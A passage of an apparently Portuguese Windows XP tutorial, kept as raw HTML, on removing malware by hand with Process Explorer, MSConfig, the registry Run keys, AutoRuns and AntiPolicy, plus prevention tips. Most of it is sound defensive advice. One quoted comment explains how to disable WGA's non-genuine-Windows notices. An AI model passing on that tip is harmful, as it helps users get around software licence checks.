0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Os malwares são programas como outros quaisquer. Na grande maioria das vezes, são programas que se configuram para iniciar junto com o Windows. E ficam fazendo sua ação. Seja enviar spam (usando o seu IP e a sua banda!), usar seu computador como servidor de um software P2P qualquer ou tentar capturar suas senhas.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Esses quase sempre podem ser removidos manualmente, usando programas simples de monitoramento. A idéia é: eles estão abertos, vamos fechá-los! E se eles se configuram para serem iniciados junto com o computador, vamos remover essa configuração. Alguns casos mais graves podem ocorrer, onde os vírus mais "poderosos" se infiltram dentro de arquivos do sistema, corrompendo-os. Aí a coisa complica, seria tarefa mais para um antivírus (agora sim, automatizada) mas normalmente dá para restaurar arquivos do sistema, caso os arquivos infectados sejam os nativos do Windows. Bem, vamos por partes...&lt;/div&gt;&lt;h3 style="color: #e30140; font-family: Tahoma, Arial, sans-serif; font-size: 11px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 25px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left;"&gt;Identificando e removendo um programa indesejado&lt;/h3&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Como no caso da minha amiga, usei uma idéia básica. Mas para isso, eu precisaria tentar chutar o programa a ser fechado, pelo nome do executável. Como saber? O Windows por si só carrega diversos programas em execução (processos) próprios, para uso do sistema. Cada programa aberto também será considerado um processo, e listado, portanto, no gerenciador de tarefas e os malwares também ficarão por ali.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;A idéia é listar ou decorar os nomes dos programas do Windows que sempre se iniciam, mais aqueles que você usa e que se iniciam automaticamente também (como seu antivírus, o firewall, etc). Com base nisso, você pode ir tentando fechar os malwares. Na dúvida, uma dica é copiar o nome do programa e jogar no Google. Se for um malware conhecido, provavelmente você irá encontrar páginas (normalmente de fóruns) relatando-o. Aí não resta dúvida, basta fechá-lo.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Acontece que o gerenciador de tarefas do Windows pode ser facilmente corrompido ou modificado, e é possível que um programa nem apareça nele. Além disso, alguns malwares bloqueiam o gerenciador de tarefas (usando recursos do próprio Windows, por incrível que possa parecer!). Para uma pescagem mais profunda, vamos usar outro gerenciador de tarefas.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Um muito bom é o Process Explorer NT. Ele é da SysInternals, que foi comprada pela Microsoft. Eu pensava que seria descontinuado depois da compra, mas pelo contrário, foi até atualizado para trabalhar melhor no Windows Vista.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;img alt="index_html_633f12ab" height="460" src="http://www.guiadohardware.net/imagens/img-df9a9a14.gif" style="border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" width="563" /&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Baixe em:&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;a href="http://www.microsoft.com/technet/sysinternals/utilities/ProcessExplorer.mspx" style="color: #97a931; font-size: 11px; font-weight: normal; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: none;"&gt;http://www.microsoft.com/technet/sysinternals/utilities/ProcessExplorer.mspx&lt;/a&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Ele lista todos os processos abertos e permite visualizar muitas informações sobre os mesmos. A listagem é hierárquica, ele mostra os processos e os processos que os originaram (o programa que abriu outro programa, numa linguagem mais clara). Clicando com o botão direito num item, pode-se matar o processo correspondente, fechando bruscamente o programa.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;O fechamento dessa forma é essencial. Uma que os malwares normalmente não exibem janelas, não tem onde você clicar para fechar. Outra que, mesmo se exibissem, é diferente o comando que o sistema operacional envia ao programa para fechá-lo. Ao clicar no botão com o X numa janela, o Windows não necessariamente fecha o programa; ele diz ao programa que é para ser fechado. O programa pode fazer o que quiser, inclusive decidir se vai mesmo ser fechado ou não.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;É isso que permite a um programa tomar a dianteira e exibir uma janela perguntando se você quer salvar um arquivo antes de fechá-lo, dando a opção de mantê-lo aberto, por exemplo. Se ele fosse fechado diretamente ao clicar no X, você perderia qualquer arquivo não salvo.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Aqui, o objetivo é justamente o contrário: fechar o programa "à força", "matar o processo", como se diz. O sistema operacional finaliza o programa e libera os recursos usados por ele (como a memória) sem notificá-lo. Algumas vezes complica um pouco, pois malwares mais elaborados podem manter duas instâncias de si mesmo, e se uma for fechada logo a outra detecta e a reabre. Mas com um pouco de paciência e prática, dá para se virar e tomar o controle. Afinal, o computador é seu, não do malware.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Esse Process Explorer NT permite até mesmo "pausar" um determinado programa, e continuá-lo depois. Estando "pausado", o programa continua aberto mas parece morto; por exemplo, esse que envia mensagens pelo MSN, não enviaria enquanto estivesse pausado. Essas ações são feitas ao clicar com o botão direito no processo, dentro do Process Explorer NT.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Pode ocorrer de você fechar um programa inofensivo realmente, por desconhecer o nome dele. Normalmente isso não lhe trará problema algum, bastará reabrir o programa que foi fechado depois. Tome o cuidado de não manter arquivos abertos ou documentos não salvos enquanto fecha os programas suspeitos, e também evite fazer isso conectado à Internet. Simples: você pode fechar seu firewall sem querer e continuar por horas navegando - sem perceber que abriu as portas do seu computador para o mundo.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Bem, fechado o programa, você pode excluir o arquivo correspondente a ele. Tome cuidado aqui, para não excluir um arquivo errado, do sistema ou de outro programa bom que você use. Antes de excluir é bom pesquisar na Internet pelo nome do executável, ou então movê-lo para uma outra pasta, ou mesmo renomeá-lo com outra extensão (por exemplo, "coisax.exe" viraria "coisax.123").&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Para excluir, você deverá saber onde se encontra o arquivo. A maioria dos spywares são instalados na pasta "system32" (creio que escolhem essa por ser uma pasta de sistema, que ainda por cima contém muitos arquivos), assim fica difícil encontrar "suspeitos" apenas olhando lá dentro. Uma dica é usar a pesquisa do sistema operacional, aquele "Pesquisar" do Iniciar, jogando o nome do arquivo desejado. Nessa tarefa, algumas configurações do Windows acabam atrapalhando. Para ficar mais seguro para você, altere estas opções:&lt;/div&gt;&lt;ul style="list-style-image: initial; list-style-position: outside; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="line-height: 18px; margin-bottom: 5px; padding-left: 0px; padding-top: 0px;"&gt;Na guia "Modos de exibição" das opções de pasta (menu "Ferramentas &amp;gt; Opções de pasta", do Windows Explorer), marque o item "Mostrar todos os arquivos" na categoria "Arquivos ocultos". E desmarque o "Ocultar arquivos protegidos do sistema operacional". Ainda ali, desmarque a opção que oculta as extensões dos arquivos. Depois disso, basta tomar cuidado ao renomear seus arquivos, onde você deverá digitar o nome junto com a extensão, e não apague alguns arquivos que "aparecerão" na unidade C:, como boot.ini, ntldr, etc. Esses arquivos são do sistema e ficam ocultos por padrão. Pedi para exibi-los pois assim ele não ocultará os outros arquivos, facilitando a localização dos malwares, inclusive usando o "Pesquisar".&lt;/li&gt;
&lt;/ul&gt;&lt;ul style="list-style-image: initial; list-style-position: outside; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="line-height: 18px; margin-bottom: 5px; padding-left: 0px; padding-top: 0px;"&gt;O "Pesquisar" do Windows XP veio para facilitar para usuários iniciantes. Para pesquisar arquivos ocultos em pastas do sistema, usando regras de pesquisa (máscaras) e opções avançadas, é terrível, ficou muito ruim. O ideal é voltar para a pesquisa clássica, igual à do Windows 2000/Me. Veja como fazer isso aqui:&lt;/li&gt;
&lt;/ul&gt;&lt;blockquote&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;a href="http://janelasepinguins.blogspot.com/2005/12/deixando-o-pesquisar-do-windows-xp2003.html" style="color: #97a931; font-size: 11px; font-weight: normal; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: none;"&gt;http://janelasepinguins.blogspot.com/2005/12/deixando-o-pesquisar-do-windows-xp2003.html&lt;/a&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;blockquote&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;(envolve edição do registro)&lt;/div&gt;&lt;/blockquote&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Pronto. Agora ficou mais fácil localizar o arquivo no disco e excluí-lo. Quase sempre os spywares estarão dentro da pasta system32, ou pelo menos na pasta do Windows. Mande pesquisar na pasta "C:windows" incluindo subpastas; caso não o encontre ali, mande buscar então em todos os discos rígidos locais. Pesquisando apenas na pasta do Windows a pesquisa será mais rápida, já que o buscador não terá que vasculhar todo o seu HD :)&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Fechado o programa, excluído o arquivo, agora falta remover o ponto de entrada de inicialização, que faz com que o programa seja carregado durante o boot do sistema. Os programas que se iniciam junto com o computador podem ficar configurados em alguns lugares diferentes no Windows. Uma forma básica de ver isso é usar o MSConfig, programinha que já vem com o Windows (exceto NT e 2000) e que lista os programas abertos. Clique no "Iniciar &amp;gt; Executar", digite&amp;nbsp;&lt;strong&gt;msconfig&lt;/strong&gt;&amp;nbsp;e tecle enter. Na aba "Inicializar", localize os itens desejados e desmarque o suposto malware. Depois de desmarcado, clique em Aplicar &amp;gt; OK. Ele pedirá para reiniciar o computador, fica a seu critério reiniciar no momento ou depois.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Dica: desativando outros itens desnecessários pelo MSConfig também, fará com que o computador inicie um pouco mais rápido e use menos memória; mas cuidado para não desativar programas importantes, como o firewall, antivírus (se você usar), etc.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Importante: sempre remova a entrada de inicialização do programa com ele fechado. Se você não fizer isso, alguns programas ficam regravando as chaves no registro enquanto estão abertos, justamente para que se você remova, logo eles regravam e serão inicializados depois, na maior cara de pau. Com eles fechados, simplesmente não têm como regravar.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Nem sempre será fácil remover programas indesejados dessa forma, mas boa parte deles podem ser removidos assim, por incrível que possa parecer :)&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Outra dica é iniciar o computador limpo, sem spywares, e anotar os nomes dos programas que se iniciam automaticamente (seja pelo Process Explorer NT ou pelo próprio gerenciador de tarefas). Boa sorte :)&lt;/div&gt;&lt;h3 style="color: #e30140; font-family: Tahoma, Arial, sans-serif; font-size: 11px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 25px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left;"&gt;Outras formas de detectar programas que se iniciam automaticamente&lt;/h3&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Há diversas formas. As mais comuns são pelas chaves do registro:&lt;/div&gt;&lt;ul style="list-style-image: initial; list-style-position: outside; list-style-type: none; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px;"&gt;&lt;li style="line-height: 18px; margin-bottom: 5px; padding-left: 0px; padding-top: 0px;"&gt;HKEY_LOCAL_MACHINE &amp;gt; Software &amp;gt; Microsoft &amp;gt; Windows &amp;gt; CurrentVersion &amp;gt; Run&lt;/li&gt;
&lt;li style="line-height: 18px; margin-bottom: 5px; padding-left: 0px; padding-top: 0px;"&gt;HKEY_LOCAL_MACHINE &amp;gt; Software &amp;gt; Microsoft &amp;gt; Windows &amp;gt; CurrentVersion &amp;gt; RunOnce&lt;/li&gt;
&lt;li style="line-height: 18px; margin-bottom: 5px; padding-left: 0px; padding-top: 0px;"&gt;HKEY_CURRENT_USER &amp;gt; Software &amp;gt; Microsoft &amp;gt; Windows &amp;gt; CurrentVersion &amp;gt; Run&lt;/li&gt;
&lt;li style="line-height: 18px; margin-bottom: 5px; padding-left: 0px; padding-top: 0px;"&gt;HKEY_CURRENT_USER &amp;gt; Software &amp;gt; Microsoft &amp;gt; Windows &amp;gt; CurrentVersion &amp;gt; RunOnce&lt;/li&gt;
&lt;/ul&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Mas há também a pasta "Inicializar" no menu "Iniciar &amp;gt; Programas". Alguns programas criam entradas ali, para esta é mais fácil: basta excluir o atalho. Clique em "Iniciar &amp;gt; Programas &amp;gt; Inicializar"; depois, clique com o botão direito no item desejado (se houver) e mande excluir.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Para as chaves do registro... Se você não mexe muito com o registro, cuidado: não saia fuçando em tudo. Exclua apenas entradas que você tenha certeza que podem ser excluídas, pois editar incorretamente o registro pode fazer com que o Windows nem seja iniciado - claro que isso poderá ser corrigido, mas poderá não ser tão fácil.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Nota: o "registro", caso você não saiba, é um banco de dados de configurações usado pelo Windows e por diversos programas. O "editor do registro", programa "regedit", é uma interface que vem com o Windows que permite modificar as configurações gravadas no registro. O termo "registro" aqui não tem nada a ver com cadastro ou pagamento :p&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Abra o editor do registro ("Iniciar &amp;gt; Executar" &amp;gt; digite&amp;nbsp;&lt;strong&gt;regedit&lt;/strong&gt;&amp;nbsp;e dê OK). Ele tem o visual parecido com o do Windows Explorer, tratando as chaves do registro como se fossem "pastinhas". À esquerda, localize as chaves e subchaves conforme indicam as setas nos caminhos indicados mais acima, até chegar na "Run" ou "RunOnce". À direita são listadas as entradas referentes à chave selecionada à esquerda, que no caso, correspondem aos programas que se iniciam automaticamente com o computador. Selecione o do malware e delete, usando a tecla Del mesmo do teclado. Como falei, cuidado ao fazer isso; se não se sentir seguro, prefira usar o MSConfig ou esse outro programa que indicarei agora.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Também da SysInternals (agora Microsoft) um bom software é o AutoRuns. Ele lista praticamente tudo o que se inicializa com o Windows, incluindo muitos itens não exibidos pelo MSConfig. Veja:&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;img alt="index_html_58236bb7" height="367" src="http://www.guiadohardware.net/imagens/img-34637a70.gif" style="border-bottom-style: none; border-color: initial; border-left-style: none; border-right-style: none; border-top-style: none; border-width: initial;" width="540" /&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Baixe-o em:&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;a href="http://www.microsoft.com/technet/sysinternals/Utilities/AutoRuns.mspx" style="color: #97a931; font-size: 11px; font-weight: normal; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: none;"&gt;http://www.microsoft.com/technet/sysinternals/Utilities/AutoRuns.mspx&lt;/a&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Ele é composto por várias abas de categorias. Com ele você pode desmarcar os itens e remarcá-los depois, caso se arrependa. Mas ainda assim, tome o cuidado de não desmarcar itens à toa, pois vários, "muitos" na verdade, correspondem a componentes essenciais do Windows. Por meio dele pode-se desativar extensões do Explorer, do logon, do IE, drivers de dispositivos e outros componentes. Ele é muito importante, deveria vir de fábrica com o Windows.&lt;/div&gt;&lt;blockquote&gt;&lt;div&gt;&lt;em&gt;Comentário: é possível desativar também aquele WGA, que exibia notificações em Windows não originais; bastando desmarcar o ponto que carregava o WGA, no processo de logon do Windows, e a seguir deletando os arquivos do WGA do HD.&lt;/em&gt;&lt;/div&gt;&lt;/blockquote&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Tanto o Process Explorer como o AutoRuns são gratuitos e não precisam ser instalados, eles rodam diretamente, sendo muito úteis para fazer parte da mala de ferramentas dos técnicos Windows.&lt;/div&gt;&lt;h3 style="color: #e30140; font-family: Tahoma, Arial, sans-serif; font-size: 11px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 25px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left;"&gt;Windows bloqueado?&lt;/h3&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Alguns spywares e malwares em geral desativam componentes do Windows, usando recursos do próprio sistema.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Isso é possível porque o Windows foi projetado para suportar diretivas de empresas e grupos, onde os funcionários podem usar os computadores, mas não alterar configurações. Alguns spywares dão uma de "administradores" no seu sistema, bloqueando diversas coisas. Entre as mais visadas estão o bloqueio da página inicial do Internet Explorer, a edição do registro pelo regedit, de forma que você não consegue abri-lo nem usar os arquivos ".reg", e em alguns casos, bloqueiam até o gerenciador de tarefas, para evitar que sejam fechados (aqui usar o Process Explorer NT normalmente resolve).&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Esses bloqueios são feitos pelo registro, e caso você não possa abrir o regedit, e/ou se quiser remover diversos bloqueios de uma vez, recomendo um software meu mesmo: o AntiPolicy. Basta abri-lo, clicar na aba "AntiPolicy" e então no botão "Remover bloqueios...".&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Quase todos esses bloqueios serão liberados de imediato, alguns só no recarregamento do Explorer (no próximo logon, por exemplo). Vale a dica: primeiro, feche os malwares e certifique-se de que não estejam marcados para inicializar depois, pois eles poderão restaurar os bloqueios se forem abertos.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Download do AntiPolicy:&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;a href="http://www.mephost.com/software/antipolicy.htm" style="color: #97a931; font-size: 11px; font-weight: normal; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: none;"&gt;http://www.mephost.com/software/antipolicy.htm&lt;/a&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Esse programa ainda permite fechar bruscamente processos também, servindo como um gerenciador de processos alternativo. Enquanto que o gerenciador de tarefas do Windows e o Process Explorer NT listam os processos pelo nome do executável, o AntiPolicy lista pelos nomes das classes de janelas. A maioria dos spywares não têm janelas visíveis, mas têm janelas ou pelo menos controles que não ficam visíveis mas são listados. No AntiPolicy, você pode fechar qualquer programa, pela aba "Visíveis" (os que estão rodando na barra de tarefas ou em uma janela) ou "Ocultos" (os que rodam sem ser exibidos, que vem a ser o caso da maioria dos malwares). Vale o cuidado de testar e ficar atento, pois você poderá fechar programas bons sem saber o nome da classe.&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Diversos spywares usam nomes com XXX alguma coisa (referentes à pornografia), hk (da palavra "hacker"), ou somente números. Mas não há regras, você terá que caçar um pouco, e qualquer coisa, o Google está à disposição para nos ajudar (bem indiretamente, claro).&lt;/div&gt;&lt;h3 style="color: #e30140; font-family: Tahoma, Arial, sans-serif; font-size: 11px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 25px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: left;"&gt;O Windows é seguro?&lt;/h3&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Até aqui vimos como tentar remover pragas que já foram instaladas. Mas... O melhor é prevenir, não remediar, não é? É melhor andar pela sombra do que ficar com dor de cabeça, é melhor usar blusa e guarda chuva do que pegar um resfriado. Vamos a algumas dicas então, que a maioria acha que todo mundo já está careca de saber (mas infelizmente, não é bem assim).&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Use conta limitada (não de administrador) no dia-a-dia se puder, e mantenha o HD formatado em NTFS. Mais informações sobre o NTFS e a segurança aos arquivos podem ser vistas neste outro texto meu aqui no GdH:&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;a href="http://www.guiadohardware.net/dicas/sistema-ntfs.html" style="color: #97a931; font-size: 11px; font-weight: normal; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: none;"&gt;http://www.guiadohardware.net/dicas/sistema-ntfs.html&lt;/a&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Usar o Windows com conta limitada em partições NTFS é muito mais seguro, apesar de não ser agradável para o uso de alguns programas. Navegando assim, os malwares não poderão se instalar em pastas do sistema (como a system32, dentro da pasta do Windows) e não afetarão as outras contas de usuário, caso haja outros perfis no mesmo PC. É possível também rodar o IE (ou outro programa qualquer) como administrador, porém, sem direitos administrativos. Veja como no final desse outro texto:&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;&lt;a href="http://www.guiadohardware.net/artigos/reparando-ie/" style="color: #97a931; font-size: 11px; font-weight: normal; outline-color: initial; outline-style: none; outline-width: initial; text-decoration: none;"&gt;http://www.guiadohardware.net/artigos/reparando-ie/&lt;/a&gt;&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Use um firewall. O do Windows XP SP2 é muito ruim (que me perdoe a Microsoft). De que adianta o sistema vir com um firewall se você deve desativá-lo e instalar outro, para mais proteção? Isso porque é um fato, o do XP SP2 protege contra invasões vindas da Internet, ou seja, protege contra acessos entrantes. Se um programa no seu PC tentar enviar um comando ou arquivo para a Internet, ele deixa (só bloqueia e alerta caso o programa tente ficar aberto em determinada porta, como um servidor, à espera de conexões entrantes).&lt;/div&gt;&lt;div style="font-size: 12px; margin-bottom: 5px; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; text-align: justify;"&gt;Isso é ruim no caso de spywares: eles podem enviar dados (seus dados, suas senhas capturadas, por exemplo) sem que você tome conhecimento. O ideal é instalar um firewall de terceiros, que proteja o computador tanto de conexões de entrada como de saída, dando a possibilidade de você decidir se elas devem ser liberadas ou não. Um que tem versão gratuita e é muito usado é o ZoneAlarm. O Comodo também é bom e possui versão 